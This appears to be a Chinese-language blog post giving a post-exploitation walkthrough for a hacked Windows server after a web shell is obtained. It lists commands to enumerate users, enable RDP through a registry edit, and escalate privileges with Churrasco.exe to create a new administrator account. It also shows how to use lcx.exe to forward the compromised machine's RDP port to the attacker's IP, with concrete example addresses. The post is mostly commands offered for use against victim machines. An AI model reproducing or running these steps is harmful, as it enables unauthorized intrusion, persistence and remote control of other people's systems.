对于渗透思路和web命令的一些用法

// 后面是注解 命令中不需要后面的//

首先拿到shell后

以我个人的感觉应该探测下用户

query user // 判断下是否有用户登录和其他人登录过

其次在探测远程端口是否开放

netstat -an // 查看是否开放了3389端口

如果没有3389端口 那么判断下是否远程端口更改

首先开启下端口试试看

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 

//开启一下3389 端口 尝试连接

tasklist  /svc  // 查找一下进程PID 找到termservice服务对应的PID

netstat  -ano  //通过查找进程pid判断端口所对应服务

找到端口后&＃xff0c;远程登录。

如果判断内网或者无权限等情况

运用巴西烤肉进行提权

Churrasco.exe "net user 用户名 密码 /add && net localgroup administrators 用户名 /add"

最后用户有了远程端口有了&＃xff0c;可是无聊连接上判断是否是开启了IP指定登录或是内网

内网情况建议执行lcx进行端口转发进行连接

先本地监听X端口 lcx.exe -listen X 3389

c:\recycler\lcx.exe -slave 自己的ip X 肉鸡IP 3389    LCX转发

c:\recycler\lcx.exe -slave 202.134.12.12 X 123.123.4.4 3389

最后如何利用lcx搭建跳板呢&＃xff1f;留给各位同学的一个课题作业吧&＃xff01;

欢迎互相指教 大道三千&＃xff0c;欢迎探讨&＃xff01;